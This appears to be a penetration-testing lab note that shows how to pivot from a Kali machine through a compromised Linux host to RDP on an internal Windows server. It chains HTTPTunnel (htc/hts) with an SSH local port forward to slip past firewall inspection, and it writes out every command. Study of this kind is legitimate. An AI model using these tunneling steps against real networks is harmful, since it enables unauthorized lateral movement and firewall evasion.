Scenario

Goal

RDP over HTTP from Kali to a Windows Server in the internal network, using HTTPTunnel (htc on the attacker side, hts on the compromised host) to wrap the RDP stream in HTTP requests.

What we already have or know:

  • A fully compromised Linux machine connected to the internal network
  • The Linux shell is HTTP-based (port 443), so 443 is already in use
  • The firewall only allows inbound traffic on ports 80, 443 and 1234
  • No service is listening on port 1234 on the Linux machine, so it is free to host the tunnel endpoint
  • Hosts
    • Kali (attacker machine)
    • Linux (compromised server): 10.11.0.123
    • Windows (target in the internal network): 192.168.1.11

Execution

  • Establish an HTTP-based tunnel from Kali port 8080 to Linux port 1234 (the RDP stream is wrapped in HTTP requests, so it passes inspection that only expects HTTP on the allowed ports)
    • On Kali: htc --forward-port 8080 10.11.0.123:1234
    • --forward-port here specifies the local listener port on Kali; the RDP client will connect to 127.0.0.1:8080
  • Decapsulate the HTTP tunnel traffic arriving on Linux 1234 and hand the plain TCP stream to Linux 8888 (RDP doesn't understand HTTP tunneling)
    • On Linux: hts --forward-port localhost:8888 1234
    • --forward-port here specifies where the decapsulated traffic will be forwarded to; the last argument (1234) is the port hts listens on
  • Establish an SSH local port forward from Linux 8888 to Windows 3389 (RDP); this needs sshd running on the Linux machine and valid credentials for the account used
    • On Linux: ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -NfL 0.0.0.0:8888:192.168.1.11:3389 user@localhost
    • Bring this forward up before the first tunnelled connection arrives, since hts connects to localhost:8888 for every decapsulated session
    • Binding to 127.0.0.1 instead of 0.0.0.0 is enough here (hts connects over loopback) and avoids exposing 8888 to the rest of the network
  • Connect the RDP client on Kali to the local htc listener, e.g. xfreerdp /v:127.0.0.1:8080 or rdesktop 127.0.0.1:8080
    • Path of the connection: Kali 8080 (htc) -> HTTP over 1234 -> Linux hts -> Linux 8888 (ssh -L) -> Windows 192.168.1.11:3389